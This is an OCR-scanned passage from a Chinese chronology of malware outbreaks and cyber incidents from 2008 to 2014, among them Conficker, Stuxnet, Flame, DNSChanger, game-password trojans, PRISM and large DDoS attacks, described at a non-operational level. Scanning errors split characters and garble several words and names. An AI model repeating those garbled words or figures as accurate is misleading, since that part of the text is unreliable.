2008 年 还 出 现 “ 磁 碟 机 /dummycom” 病 毒 。 该 病毒 是 当时 传播 最 迅速 ,变种 最 快 , 破 
坏 力 最 强 的 病毒 。 据 统计 ,每 日 感染 磁 碟 机 病毒 人 数 已 逾 1 001 000 用 户 。“ 磁 碟 机 / 
dummycom” 现 已 经 出 现 100 余 个 变种 ,当时 病毒 感染 和 传播 范围 呈现 出 蔓延 之 势 。 病 毒 
造成 的 危害 及 损失 10 倍 于 “熊猫 烧香 ”。 该 病毒 是 一 个 下 载 者 病毒 ,会 关闭 一 些 安全 工 
具 和 杀毒 软件 并 阻止 其 运行 ,并 会 不 断 检测 窗口 来 关闭 一 些 杀毒 软件 及 安全 辅助 工具 ， 
破坏 安全 模式 ,删除 一 些 杀毒 软件 和 实时 监控 的 服务 ,远程 注入 到 其 他 进程 来 启动 被 结 
束 进程 的 病毒 。 

2008 年 的 “机 器 狗 ” 病 毒 也 造成 了 极 大 的 破坏 。 该 病毒 可 以 穿 透 各 种 还 原 软件 与 硬 
件 还 原 卡 ,通过 pcihdd. sys 驱动 文件 抢占 还 原 软件 的 硬盘 控制 权 。 并 修改 用 户 初始 化 文 
件 userinit. exe 来 实现 隐藏 自身 的 目的 。 此 病毒 为 一 个 典型 的 网 络 架 构 木 马 型 病毒 , 病 
毒 穿 透 还 原 软件 后 将 自己 保存 在 系统 中 ,定期 从 指定 的 网 站 下 载 各 种 木马 程序 来 截取 用 
户 的 账号 信息 。 

截至 2008 年 12 月 31 日 ,中 国 互 联网 络 信息 中 心 CCNNIC) 统 计数 据 显示 ,我国 网 民 
数 达 到 2.98 亿 人 ,互联 网 普及 率 达 22. 6%。 宽 带 网 民 规 模 达 到 2.7 亿 , 占 网 民 总 体 的 
90.6%。 我 国 域名 综述 达到 16 826 198 个 ,其 中 . CN 域名 数量 达到 13 572 326 个 ,网 站 
数 约 2 878 000 个 ,国际 出 口 带宽 约 640 286. 67Mbps。 

2008 至 2009 年 间 , 网 上 出 现 了 一 种 新 型 蠕虫 ,名 为 “ 飞 客 /Conficker/ Downup”。 中 
国 大 陆 成 为 感染 该 病毒 的 重 灾区 ,每 月 感染 约 1800 万 个 主机 IP 数量 。“ 飞 客 / 
Conficker/ Downup” 主 要 利用 Windows 操作 系统 MS08-067 漏洞 来 传播 ,同时 也 能 借助 
任何 有 USB 接口 的 硬件 设备 来 感染 。 感 染 后 不 仅 会 产生 泄密 隐患 ,还 会 被 黑客 利用 来 
发 动 网 络 攻击 。 

2009 年 ,“U 盘 寄 生 虫 "“ 刻 毒 虫 >"“ 无 极 杀手 ”“ 文 件 夹 寄 生 虫 ”等 病毒 都 十 分 猩 狐 。 
“U 盘 寄 生 虫 "病毒 文件 一 般 存在 于 U 盘 、MP3 移动 硬盘 和 硬盘 各 个 分 区 的 根 目录 下 , 当 
用 户 双 击 U 盘 等 设备 的 时 候 , 该 文件 会 利用 Windows 系统 的 自动 播放 功能 优先 运行 
autorun. inf 文件 ,而 该 文件 会 执行 所 要 加 载 的 病毒 程序 ,从 而 破坏 用 户 计算 机 ,使 用 户 计 
算 机 遭受 损失 六 刻 毒 虫 "病毒 利用 U 盘 和 系统 漏洞 在 局 域 网 和 不 同系 统 之 间 进 行 传播 ， 
其 具有 下 载 其 他 恶意 程序 干扰 被 感染 系统 访问 指定 站 点 、 反 安全 软件 以 及 自我 升级 更 
新 的 功能 ,可 以 说 是 集 现代 病毒 主要 危害 和 传播 方式 于 一 身 的 “大 成 者 ”; “无 极 杀 手 ” 病 
毒 能 够 关闭 目前 市 场 上 几乎 所 有 主流 的 杀毒 软件 或 安全 软件 ,而 国外 的 几 款 杀毒 软件 以 
及 利用 国外 杀毒 引擎 的 免费 杀毒 软件 ,在 这 个 病毒 面前 更 是 毫 无 抵抗 之 力 , 开 启 所 有 监 
控 后 ,还 是 可 以 被 病毒 轻松 结束 进程 ;* 文 件 夹 寄 生 虫 "病毒 通常 会 将 硬盘 根 目 录 下 的 正 
常 文件 夹 隐藏 ,将 自身 伪装 成 文件 夹 样 式 图 标 ,并 将 自身 命名 为 被 隐藏 文件 夹 的 名 称 。 

2009 年 还 出 现 了 许多 瓷 取 网 络 游 戏 账号 的 木马 ,例如 “网 游 窃 贼 "、“ 玛 格 尼 亚 ” 等 。 
“网 游 穷 贼 ” 变 种 nf, 是 一 个 最 新 的 木马 变种 ,运行 后 会 释放 出 病毒 文件 iexpl0re. exe, 大 
小 为 47 185 字 节 。 它 通过 在 注册 表 中 添加 启动 项 实现 开机 自 启 , 盗 取 传奇 .魔兽 世界 、 完 
美 世 界 .征途 等 多 款 网 络 游戏 账户 密码 和 玩家 装备 。“ 玛 格 尼 亚 ” 变 种 bde 是 “ 玛 格 尼 亚 ” 
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木马 家 族 的 最 新 成 员 之 一 ,采用 高 级 语言 编写 ,并 经 过 加 壳 处 理 。“ 玛 格 尼 亚 ” 变 种 bde 
运行 后 ,自我 复制 到 被 感染 计算 机 系统 的 指定 目录 下 ,并 在 指定 目录 下 释放 一 个 恶意 
DLL 组 件 文件 ,修改 注册 表 , 实 现 木马 开机 自动 运行 。 它 在 被 感染 计算 机 的 后 台 盗 取 网 
络 游戏 玩家 的 游戏 账号 ,游戏 密码 .身上 装备 .背包 装备 .角色 等 级 .金钱 数量 ,游戏 区 服 、 
计算 机 名 称 等 信息 ,并 在 被 感染 计算 机 的 后 台 将 窃取 到 的 玩家 游戏 账号 信息 发 送 到 骇 客 
指定 的 远程 服务 器 站 点 上 ,造成 玩家 的 游戏 账号 、 装 备 物品 、 金 钱 等 丢失 ,给 游戏 玩家 带 
来 非常 大 的 损失 。 

2010 年 6 月,“ 震 网 /Stuxnet” 蠕 虫 病毒 被 首次 发 现 。 该 病毒 是 第 一 个 专门 定向 攻击 
真实 世界 中 基础 (能 源 ) 设 施 的 “蠕虫 "病毒 ,比如 核电 站 水坝、 国家 电网 。 作 为 世界 上 首 
个 网 络 “ 超 级 破坏 性 武器 ” ,该 病毒 已 经 感染 了 全 球 超过 45 000 个 网 络 。 计 算 机 安防 专家 
认为 ,该 病毒 是 有 史 以 来 最 高 端的 “蠕虫 "病毒 , 它 的 复杂 程度 远 超 一 般 电 脑 黑 客 的 能 力 。 
据 统 计 , 近 60% 的 感染 发 生 在 伊朗 ,其 次 为 印尼 ( 约 20%) 和 印度 ( 约 10%) ,阿塞拜疆 、 美 
国 与 巴基斯坦 等 地 亦 有 小 量 个 案 。“ 震 网 /Stuxnet” 感 染 的 重 灾区 集中 在 伊朗 境内 ,因此 
美国 和 以 色 列 因此 被 怀疑 是 “ 震 网 /Stuxnet" 的 发 明 人 。 它 的 打击 对 象 是 全 球 各 地 的 重要 
目标 ,所 以 被 一 些 专家 定性 为 全 球 首 个 投入 实战 舞台 的 “网 络 武器 "。 这 种 新 病毒 采取 了 
多 种 先进 技术 ,因此 具有 极 强 的 隐身 和 破坏 力 ,只 要 电脑 操作 员 将 被 病毒 感染 的 U 盘 插 
入 USB 接口 ,这 种 病毒 就 会 在 神 不 知 鬼 不 觉 的 情况 下 取得 一 些 工 业 用 电脑 系统 的 控 
制 权 。 

2011 年 出 现 了 一 种 恶意 病毒 名 为 “温柔 杀手 ”。“ 温 柔 杀手 ”病毒 主要 通过 那些 在 线 
播放 盗版 电影 和 不 良 视 频 的 网 站 传播 ,要 播放 这 些 网 站 的 视频 ,必须 安装 专用 播放 器 ,而 
病毒 就 藏匿 其 中 。 中 了 该 病毒 后 ,电脑 运行 速度 变 卡 ,查看 进程 会 发 现 异常 程序 ,浏览 器 
主页 被 锁定 为 某 个 网 址 导航 站 ,桌面 生成 若干 个 异常 快捷 方式 图 标 ,并 且 经 常会 弹出 一 
些 中 奖 彩票 之 类 的 钓鱼 网 站 。 病 毒 首先 在 系统 中 释放 病毒 执行 程序 C:\WINDOWS\ 
system32\kb. dl ,然后 再 感染 若干 个 系统 关键 文件 ,比如 explorer. exe 和 winlogon. exe。 
并 且 , 因 为 “温柔 杀手 ”病毒 还 会 下 载 更 多 盗号 木马 ,导致 系统 被 大 量 病 毒 和 木马 破坏 ,使 
得 针对 “温柔 杀手 ”病毒 的 修复 变 得 较为 复杂 。 若 被 某 些 杀 毒 软件 不 当 处 置 , 则 会 在 下 次 
开机 重启 时 蓝屏 。 

2011 年 还 出 现 了 全 球 首 例 可 以 刷 写 BIOS 的 木马 ,名 为 “BMW” 木 马 。“BMW” 木 马 
是 最 新 捕获 的 一 款 高 危 木 马 , 该 木马 能 够 连环 感染 主板 芯片 程序 (BIOS) 硬盘 主 引 导 区 
(MBR) 和 Windows 系统 文件 ,使 受害 电脑 无 论 重 装 系统 .格式 化 硬盘 ,还 是 换 掉 硬 盘 都 
无 法 彻底 清除 病毒 。 

2011 年 还 出 现 了 “网 银 大 盗 ” 木 马 , 该 木马 是 当年 危害 最 大 的 网 购 木 马 。 该 木马 通过 
键盘 记录 的 方式 ,监视 用 户 操作 。 当 用 户 使 用 个 人 网 上 银行 进行 交易 时 ,该 木马 会 恶意 
记录 用 户 所 有 的 账号 和 密码 ,记录 成 功 后 ,木马 会 将 盗 取 的 账号 和 密码 发 送 给 木马 作者 ， 
造成 经 济 损失 。 

根据 金山 毒霸 安全 中 心 统计 ,2012 年 共 捕 获 病 毒 样本 总 量 超过 4200 万 个 , 比 上 一 年 
增长 41.4% ,月 捕获 病毒 样本 数 在 300 一 450 万 个 之 间 , 日 均 超过 11 万 个 。2012 年 统计 
到 病毒 感染 超过 2. 3 亿 台 次 , 比 2011 年 下 降 14%。 比 较 典 型 的 有 ”* 鬼 影 病 毒 "“AV 终 
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结 者 末日 版 "“ 网 购 木 马 ”“456 游戏 木马 ”“ 连 环 木 马 ”“QQ 粘 虫 ”木马 “新 淘宝 客 ” 病 
毒 等 病毒 类 型 对 用 户 危 害 最 大 。 

2012 年 1 月 , 赛 门 铁 克 公告 证 实 两 款 企业 级 产品 源 代码 被 资 。2012 年 1 月 6 日 , 赛 
门 铁 克 官方 发 言 人 Cris Paden 向 美国 媒体 表示 ,被 次 的 两 款 企业 版 防 病毒 产品 源码 , 具 
体 分 别 为 Endpoint Protection 11. 0(SEP) 和 Symantec AntiVirus 10.2。 虽 然 这 两 款 产 
品 不 是 赛 门 铁 克 最 新 的 版 本 .但 依然 在 售后 支持 行列 。Cris Paden 强调 ,虽然 这 次 事件 看 
上 去 很 严重 ,但 不 会 影响 诺顿 的 任何 消费 者 。 而 且 这 次 源 代码 泄露 并 非 是 黑客 攻破 了 赛 
门 铁 克 本 身 的 安全 机 制 ,而 是 通过 攻击 第 三 方 渠 道 盗 取 的 。 

2012 年 2 月 ,黑客 组 织 Anonymous 威胁 要 干掉 整个 互联 网 。 著 名 黑客 组 织 
Anonymonus 一 直 对 美国 新 的 反 盗 版 法 案 SOPA 持 强 烈 反 对 态度 ,不 过 这 次 他 们 玩 得 过 
火 了 。 该 组 织 威胁 要 干掉 整个 互联 网 以 给 “SOPA 法 案 、 华 尔 街 及 黑心 银行 家 以 及 前 者 
的 保护 金 政府 ”等 一 点 颜色 看 看 ,如 果 代 号 名 为 Operation Global Blackout 的 行动 成 功 ， 
那么 全 世界 将 在 3 月 31 日 陷入 无 法 使 用 互联 网 的 状态 。 至 于 具体 手段 ,Anonymous 计 
划 对 所 有 13 台 DNS 域名 根 服务 器 发 起 大 规模 DDoS 行动 ,届时 在 浏览 器 中 输入 所 有 域 
名 都 将 返回 错误 页 面 , 使 得 不 少 用 户 届时 将 认为 网 络 无 法 使 用 。Anonymous 称 他 们 的 行 
动 只 是 给 美国 政府 一 个 警告 而 不 是 计划 彻底 “ 杀 死 "互联 网 ,但 他 们 没有 说 明 行动 具体 的 
持续 时 间 , 可 能 是 几 个 小 时 也 可 能 会 是 几 天 。 

2012 年 4 月 ,VMware 确认 ESX Hypervisor 源 代码 被 窃 。VMware 已 经 确定 关于 
ESX Hypervisor 的 源 代码 已 经 泄露 。 据 查 是 一 位 自称 Hardcore Charlie 的 黑客 在 4 月 8 
日 偷 取 的 。2012 年 4 月 25 日 ,VMware 确定 被 偷盗 ,并 表示 “未 来 也 存在 源 代码 被 偷盗 
的 潜在 危险 ”。 不 过 所 幸 的 是 其 偷 走 的 源 代码 是 2003 一 2004 年 的 。 尽 管 目前 VMware 
ESX 仍然 可 以 使 用 ,但 VMware 还 是 建议 用 户 马 上 升级 到 最 新 代号 为 ESXi 的 
hypervisor, 该 版 本 在 安全 性 方面 得 到 了 加 强 。“ 事 实 上 源 代码 未 必 不 能 共享 ,只 不 过 这 
会 增加 VMware 用 户 的 风险 .” 公 司 称 :“VMware 已 经 和 其 他 致力 于 开发 虚拟 化 系统 的 
企业 进行 了 长 期 有 效 的 合作 ,我 们 已 经 将 用 户 的 安全 放 在 首要 地 位 ,目前 我 们 已 经 提供 
了 VMware 安全 反馈 中 心 (VMware Security Response Center) 并 积极 应 对 各 项 挑战 。 
未 来 还 会 继续 加 强 软 件 安全 方面 ,保护 用 户 的 私人 信息 。” 

2012 年 5 月 ,中 东 上 万 台电 脑 发 现 Flame 新 型 蠕虫 病毒 。2012 年 5 月 29 日 ,国际 
电 联 和 卡巴 斯 基 实 验 室 对 外 发 布 一 个 消息 : Flame, 一 种 新 型 的 蠕虫 病毒 在 中 东 地 区 被 
发 现 , 它 是 Stuxnet 之 后 出 现 的 又 一 个 类 似 产物 。 代 号 为 Worm. Win32. Flame 的 恶意 软 
件 是 最 近 刚 被 发 现 , 它 被 专家 描述 为 迄今 为 止 最 为 复杂 的 病毒 之 一 。 据 报道 ,中 东 大 部 
分 电脑 估计 都 被 这 种 始 于 伊朗 和 以 色 列 的 病毒 攻击 所 感染 ,北非 的 一 些 地 区 也 不 可 过 
免 。 专 家 们 认为 ,这 种 木马 病毒 最 主要 的 功能 是 它 的 间谍 功能 : 只 要 一 台电 脑 感染 了 
Flame 病毒 , 它 就 会 执行 记录 来 自 连接 或 内 置 话 简 里 的 音频 ,管理 周围 的 蓝牙 设备 ,截屏 、 
保存 一 些 文件 和 邮件 的 数据 到 电脑 里 。 并 且 这 种 对 服务 器 的 控制 是 永 无 止境 的 。 而 所 
有 收集 到 的 这 些 数据 都 是 来 自 于 预先 计划 好 的 攻击 对 象 。Flame 病毒 跟 Stuxnet 病毒 或 
者 其 分 支 Duqu 病毒 较为 类 似 , 专 家 们 认为 这 种 病毒 是 受 同 一 群 人 控制 。 据 卡巴 斯 基 实 
验 室 里 的 研究 者 说 ,最 初 感染 Flame 病毒 的 用 户 都 是 钓鱼 式 攻击 的 受害 者 ,一 旦 攻击 成 
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功 ,Flame 病毒 就 可 以 通过 局 域 网 或 者 USB 闪存 驱动 扩散 到 其 他 的 电脑 里 。 而 且 这 种 病 
毒 可 以 扩散 到 全 补丁 版 的 Windows 7 的 系统 中 。 但 是 大 部 分 用 户 们 不 需要 特别 的 担心 ， 
因为 作为 一 个 间谍 工具 , 它 攻 击 的 对 象 只 是 一 些 个 人 和 中 东 地 区 的 一 些 教 育 、 政 府 机 构 。 
另外 ,专家 还 指出 该 蠕虫 病毒 在 展开 它 的 间谍 工作 之 前 会 先 对 该 系统 进行 勘察 ,如 果 不 
是 其 要 攻击 的 对 象 , 它 将 会 自动 从 电脑 印 载 掉 。 

2012 年 7 月 ,DNSChanger 肆虐 ,全 球 400 万 台电 脑 被 感染 。 在 不 到 几 小 时 时 间 内 ， 
多 达 30 万 台电 脑 和 Mac 无 法 上 网 ,除非 用 户 立 即 清除 其 机 器 上 的 恶意 软件 。 根 据 打 击 
DNSChanger 安全 专家 小 组 表示 ,截至 2012 年 7 月 2 日 ,有 25 万 一 30 万 台电 脑 受到 感 
染 。DNSChanger 修改 用 户 的 计算 机 域名 系统 (DNS) 设 置 来 发 送 URL 请 求 到 攻击 者 自 
己 的 服务 器 ,从 而 将 受害 者 带 到 攻击 者 创建 的 网 站 。 美 国联 邦 当局 表示 ,多 达 400 万 台 
电脑 和 Mac 受到 感染 ,让 攻击 者 净 赚 1400 万 美元 。 美 国联 邦 调查 局 发 现 要 是 直接 关 掉 
这 些 不 法 集团 的 服务 器 ,那些 已 经 中 毒 的 电脑 将 无 法 上 网 ,因此 ,美国 联邦 当局 创建 了 安 
全 网 络 , 安 装 两 台 没 病毒 的 互联 网 服务 器 ,来 取代 这 些 攻击 者 的 服务 器 ,这 样 就 不 会 出 现 
突然 断 网 的 现象 。 然 而 ,由 于 经 费 问题 ,联邦 当局 这 个 服务 器 系统 会 在 美国 东部 时 间 
2012 年 7 月 9 日 中 午 12 点 后 关闭 ,届时 ,这 些 被 感染 的 机 器 将 失去 网 络 连 接 。 不 仅仅 是 
消费 者 的 电脑 和 Mac, DNSChanger 还 感染 了 政府 机 构 和 企业 的 电脑 和 系统 。 在 财富 
500 强 企 业 中 , 约 有 12% 的 企业 电脑 或 路 由 器 受到 感染 ,3.6% 的 美国 政府 机 构 受 到 感 
染 。 清 理工 作 是 清除 DNSChanger 最 艰难 的 部 分 。 有 一 家 公司 ,清理 了 所 有 机 器 的 
DNSChanger, 但 是 仍然 重新 受到 感染 ,最 终 , 该 公司 发 现 是 连接 到 公共 Wi-Fi 的 笔记 本 
在 传播 该 恶意 软件 。 即 便 如 此 ,该 公司 付出 的 努力 还 是 值得 的 ,不 仅 能 够 减轻 影响 ,而且 
能 够 为 未 来 打击 新 恶意 软件 积累 经 验 。 在 未 来 ,我 们 需要 的 是 一 个 实时 报警 功能 , 当 用 
户 计算 机 被 分 流 到 替代 服务 器 时 ,报警 系统 就 会 立即 通知 用 户 。 两 个 最 大 的 互联 网 公司 
也 在 努力 打击 DNSChanger 恶意 软件 。 在 2012 年 5 月 下 旬 , 谷 歌 开始 在 搜索 结果 页 的 
顶部 警告 受 感染 用 户 , 几 天 以 后 ,Facebook 也 向 其 用 户 发 出 了 类 似 的 警告 。 用 户 可 以 使 
用 多 个 免费 工具 来 确定 电脑 是 否 受 感染 ,例如 ,DCWG 发 布 的 工具 ,在 美国 ,用 户 可 以 访 
问 dns-ok. us 网 站 ,其 他 检测 网 站 可 以 在 DCWG 的 网 站 上 找到 ,其 网 站 还 提供 了 免费 的 
删除 该 恶意 软件 的 工具 。 也 许 无 法 上 网 正好 能 够 给 用 户 敲 响 警 钟 。 

2012 年 8 月 ,维基 解密 网 站 遭受 持续 攻击 而 无 法 登录 。 维 基 解 密 日 前 表示 ,自己 的 
网 站 遭受 到 了 持续 的 DOS( 拒 绝 服务 ) 黑 客 攻击 ,导致 网 站 在 一 周 多 的 时 间 里 反应 迟缓 或 
无 法 登录 。 维 基 解 密 在 2012 年 8 月 11 日 发 布 的 一 份 声明 中 表示 ,此 次 黑客 攻击 在 8 月 
初 开始 增强 ,之 后 扩大 到 对 其 附属 网 站 的 攻击 。DOS 攻击 是 通过 过 量 的 信息 请 求 令 网 站 
瘫痪 的 一 种 做 法 。 维 基 解 密 表 示 ,每 秒 钟 都 有 来 自 数 千 个 不 同 网 址 的 10GB 虚假 流量 涌 
人 该 网 站 。 在 线 内 容 服务 公司 Akamai 安全 信息 主管 约 什 ， 考 尔 曼 (Josh Corman) 认 为 ， 
针对 维基 解密 的 此 次 攻击 “ 远 远 大 于 ”过 去 几 年 所 见 的 普通 攻击 。 维 基 解 密 由 于 发 布 大 
量 的 机 密 美 国外 交 电 文 而 饱 受 争议 。 

2013 年 1 月 ,历史 大 规模 网 络 间谍 活动 “红色 十 月 行动 "曝光 。2013 年 1 月 16 日 , 卡 
巴 斯 基 的 安全 研究 人 员 宣 布 发 现 了 一 个 有 5 年 历史 的 大 规模 网 络 间谍 活动 “红色 十 月 行 
动 (Operation Red October)”, 该 行动 以 至 少 39 个 国家 的 外 交 使 馆 、 政 府 和 科研 机 构 为 攻 
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击 目 标 ,目标 国家 包括 美国 .巴西 .澳大利亚 和 俄罗斯 “红色 十 月 行动 ”的 活动 始 于 2007 
年 ,使 用 了 超过 1000 个 可 区 分 的 模块 。 

同样 是 在 2013 年 1 月 ,“ 伊 兹 丁 ， 哈 桑 网 络 战 士 " 表 示 ,该 组 织 对 美国 银行 网 站 遭受 
的 一 系列 分 布 式 拒绝 服务 攻击 负责 ,这 一 系列 攻击 被 称 作 是 “燕子 行动 ”第 二 阶段 。 黑 客 
攻击 的 目标 包括 美国 联合 汽车 金融 公司 .美国 BB&T 公司 .美国 第 一 资本 金融 公司 .五 三 
银行 .汇丰 银行 .美国 PNC 金融 服务 集团 .美国 富国 银行 .美国 太阳 信托 银行 以 及 美国 锡 
安 银行 。 据 美方 官员 推测 ,这 一 黑客 组 织 是 伊朗 支持 的 、 带 有 国家 行为 的 黑客 群体 。 

2013 年 2 月 ,Apple、Facebook 、Twitter 等 科技 巨头 相继 被 人 侵 , 用 户 数 据 泄 露 。 
2013 年 2 月 16 日 ,Apple、Facebook 和 Twitter 等 科技 巨头 都 公开 表示 被 黑客 人 侵 , 其 


中 Twitter 被 黑 后 泄露 了 25 万 用 户 的 资料 。 后 经 披露 证 实 是 黑客 在 某 网 站 的 HTML 


中 内 内 的 木马 代码 利用 Java 的 漏洞 侵入 了 这 些 公司 员工 的 电脑 。 

同样 是 在 2013 年 2 月 ,美国 曼 迪 昂 特 公司 首次 曝光 了 黑客 组 织 APT1 , 称 该 组 织 对 
美国 等 西方 国家 的 军事 政治 .经济 .外 交 和 商业 等 领域 展开 了 长 期 的 间谍 活动 。 美 国 能 
源 部 遭受 了 一 次 重大 且 复 杂 的 网 络 攻击 ,14 台 计 算 机 服务 器 和 20 个 工作 站 遭 到 了 入 侵 ， 
几 百 个 员工 的 私人 信息 遭 到 泄露 。 

2013 年 3 月 ,韩国 政府 等 多 家 网 站 多 次 爆发 大 规模 的 黑客 攻击 ,瘫痪 数 小 时 。2013 
年 3 月 22 日 ,韩国 爆发 历史 上 最 大 规模 的 黑客 攻击 ,韩国 主要 银行 .媒体 以 及 个 人 计算 
机 均 受 到 影响 。 大 量 企业 ,包括 国内 主流 的 银行 .电视 台 计算 机 都 被 破坏 至 瘫痪 ,导致 无 
法 提供 服务 ,大 量 资料 被 窃取 。2013 年 6 月 25 日 ,韩国 青 瓦 台 总 统 府 在 内 的 16 家 网 站 
遭 攻击 ,并 陷入 瘫痪 ,一 些 被 黑 网 站 首页 出 现 * 伟 大 的 金正 恩 领 袖 ? 等 红色 词句 。2013 年 
7 月 7 日 晚间 ,韩国 总 统 府 、 国 防 部 .外 交通 商 部 等 政府 部 门 和 主要 银行 .媒体 网 站 等 再 次 
遭 到 分 布 式 拒绝 服务 (DDoS) 攻 击 ,瘫痪 时 间 长 达 4 小 时 。 

2013 年 6 月 ,搜狗 输入 法 和 浏览 器 频频 泄露 用 户 信息 。2013 年 6 月 5 日 安全 平台 乌 
云 曝 出 搜狗 输入 法 导致 大 量 用 户 敏 感 信息 泄露 ,时 隔 5 个 月 ,央视 又 曝 出 搜狗 浏览 器 致 
用 户 QQ 支付 宝 等 信息 泄露 。 随 后 虽然 搜狗 方面 极力 回应 称 漏 洞 并 不 存在 ,但 已 有 众多 
用 户 反 馈 亲 历 过 此 事 ,不 少 媒体 .安全 专家 提醒 搜狗 用 户 , 只 有 尽快 修改 账户 密码 才能 保 
证 账户 安全 。 

同样 是 在 2013 年 6 月 , “棱镜 门 事件 爆发 ,美国 国家 安全 局 监控 用 户 隐私 。2013 年 
6 月 5 日 ,美国 前 中 情 局 (CIA) 职 员 爱 德 华 . 斯 诺顿 披露 给 媒体 两 份 绝密 资料 ,一 份 资料 
称 : 美国 国家 安全 局 有 一 项 代号 为 “棱镜 ”的 秘密 项 目 ,要 求 电信 巨头 威 瑞 森 公司 必须 每 
天 上 交 数 百 万 用 户 的 通话 记录 。 另 一 份 资料 更 加 惊人 ,美国 国家 安全 局 和 联邦 调查 局 通 
过 进入 微软 .谷歌 .苹果 等 九 大 网 络 巨头 的 服务 器 ,监控 美国 公民 的 电子 邮件 、 聊 天 记录 
等 秘密 资料 。 此 后 斯 诺 登 现 身 香 港 ,声称 自己 良心 感悟 ,无 法 允许 美国 政府 利用 “棱镜 ” 
项 目 侵 犯 全 球 民众 隐私 以 及 互联 网 自由 。 他 表示 ,美国 政府 早 在 数 年 前 就 入 侵 中 国 一 些 
个 人 和 机 构 的 电脑 网 络 , 其 中 包括 政府 官员 、 商 界 人 士 甚 至 学 校 。 斯 诺 登 后 来 前 往 俄 罗 
斯 申请 避难 ,获得 俄罗斯 政府 批准 。 

也 是 在 2013 年 6 月 ,金山 “蓝屏 门 ” 致 数 千 万 用 户 受 损 。2013 年 6 月 ,大 量 金山 毒霸 
用 户 反馈 在 更 新 6 月 微软 补丁 后 出 现 系统 蓝屏 、 崩 溃 等 故障 。 日 本 金山 6 月 12 日 晚间 向 
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日 本 市 场 用 户 致 火 ,承认 错误 并 发 出 更 新 解决 该 问题 。6 月 13 日 ,微软 发 布 官方 公告 称 
使 用 金山 毒霸 的 用 户 更 新 安全 补丁 时 可 能 出 现 问题 。 此 后 ,金山 官方 才 于 当日 傍晚 向 中 
国内 地 用 户 致 歉 。 据 权威 机 构 统 计 , 此 次 金山 补丁 门 臻 数 千 万 用 户 受 到 影响 ,直接 经 济 
损失 难以 估量 。 

2013 年 8 月 ,.cn 根 域名 服务 器 遭遇 有 史 最 大 的 DDoS 攻击 。2013 年 8 月 25 日 ,中 
国 互联 网 络 信息 中 心 CCNNIC) 发 表 声 明 , 国 家 域名 解析 节点 于 8 月 25 日 凌晨 时 许 受 到 
拒绝 服务 攻击 ,到 凌晨 3 时 服务 恢复 正常 。 期 间 大 量 .cn 域名 和 .com.cn 无 法 解析 , 受 影 
响 的 包括 新 浪 微 博 和 一 批 以 .cn 为 域名 的 网 站 。 事 后 查 明 是 由 于 黑客 利用 僵尸 网 络 攻击 
某 游戏 私服 导致 。 几 天 后 ,国家 互联 网 应 急 中 心 CNCERT/CC 运行 管理 部 处 长 王明华 
透露 ,策划 该 事件 的 黑客 已 经 在 山东 青岛 被 抓获 。 

2013 年 11 月 ,微软 发 布 Windows XP 死亡 倒计时 工具 将 同时 停止 对 杀毒 软件 更 
新 。2013 年 11 月 18 日 ,为 了 加 速 用 户 弃 用 Windows XP, 转 投 Windows 7/8 的 怀抱 , 微 
软 发 布 了 Windows XP 死亡 倒计时 小 工具 。 据 介绍 ,该 Windows XP 死亡 倒计时 小 工具 
可 以 清楚 计算 出 XP 系统 还 有 多 少 天 就 寿终正寝 。 不 过 ,让 人 费解 的 是 ,这 款 给 
Windows XP 倒计时 的 小 工具 并 不 能 在 XP 系统 运行 ,仅仅 适用 于 Windows Vista 和 
Windows 7 系统 。 此 前 ,微软 还 曾 表示 ,2014 年 4 月 8 日 起 ,微软 不 仅 会 停止 对 Windows 
XP 的 技术 支持 与 更 新 ,还 会 停止 XP 平台 上 的 杀毒 软件 MSE 的 更 新 。 

同样 是 在 2013 年 11 月 ,腾讯 7000 多 万 QQ 群 数据 公开 泄露 。2013 年 11 月 20 日 ， 
国内 知名 漏洞 网 站 乌云 曝光 称 , 腾 讯 QQ 群 关系 数据 被 泄露 ,在 迅雷 上 很 容易 就 能 找到 
数据 下 载 链接 。 据 测试 ,该 数据 包括 QQ 号 .用户 备注 的 真实 姓名 、 年 龄 .社交 关系 网 甚 
至 从 业经 历 等 大 量 个 人 隐私 。 数 据 库 解压 后 超过 90GB, 有 7000 多 万 个 QQ 群 信息 ， 
12 亿 多 个 部 分 重复 的 QQ 号 码 。 随 后 腾讯 公司 回应 称 , 此 次 QQ 群 泄露 的 只 是 2011 年 
之 前 的 数据 ,黑客 攻击 的 漏洞 也 已 经 修复 。 不 过 这 么 大 规模 数据 在 网 上 公开 ,由 此 引发 
的 后 遗 症 很 难 消除 。 目 前 已 有 网 站 打出 “精准 营销 ”的 旗号 ,根据 QQ 用 户 的 真实 姓名 、 
爱好 ,经历 .从 业 特 征 发 送 垃 圾 邮件 ,更 让 人 担心 的 是 ,这 些 数据 可 能 被 不 法 分 子 利用 进 
行 诈骗 。 如 果 一 个 人 的 真实 姓名 和 QQ 号 、 群 关系 都 在 网 上 暴露 出 来 ,诈骗 信息 将 更 加 
难以 防范 。 

2013 年 12 月 ,12306 网 站 上 线 数 小 时 被 发 现存 在 漏洞 。2013 年 12 月 6 日 ,新 版 中 
国 铁路 客户 服务 中 心 12306 网 站 正式 上 线 试 运行 。 不 过 ,就 在 上 线 第 一 天 ,擅长 “挑刺 ” 
的 IT 高 手 们 就 发 现 12306 新 版 网 站 存在 漏洞 。 漏洞 发 现 者 指出 ,12306 网 站 漏洞 泄露 用 
户 信 息 , 可 查询 登录 名 、 邮 箱 、 姓 名、 身份 证 以 及 电话 等 隐私 信息 。 另 一 个 漏洞 的 发 现 者 
也 曝 出 “新 版 12306 网 站 存在 多 个 订 票 逻辑 漏洞 ”, 该 漏洞 可 能 导致 后 期 订 票 软件 泛滥 ， 
造成 订 票 不 公 。 铁 路 总 公司 对 此 回应 ,“ 上 线 当 晚 漏 洞 已 经 弥补 ”, 但 12306 的 安全 性 也 
由 此 被 人 们 打上 一 个 大 大 的 问号 。 

2014 年 1 月 21 日 ,国内 通用 项 级 域 的 根 服务 器 忽然 出 现 异常 ,导致 中 国 众多 知名 网 
站 出 现 大 面积 DNS 解析 故障 ,这 一 次 事故 影响 到 了 国内 绝 大 多 数 DNS 服务 器 ,很 多 网 
站 被 解析 到 65. 49. 2. 178 这 一 IP 地 址 , 近 2/3 的 DNS 服务 器 瘫痪 ,时 间 持 续 数 小 时 之 
久 。 事 故 发 生 期 间 , 超 过 85% 的 用 户 遭 遇 了 DNS 故障 ,导致 网 速 变 慢 和 打 不 开 网 站 的 情 
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况 ,部 分 地 区 用 户 甚 至 出 现 断 网 现象 。 国 家 顶级 域名 . cn 由 于 其 服务 器 在 国内 没有 受到 
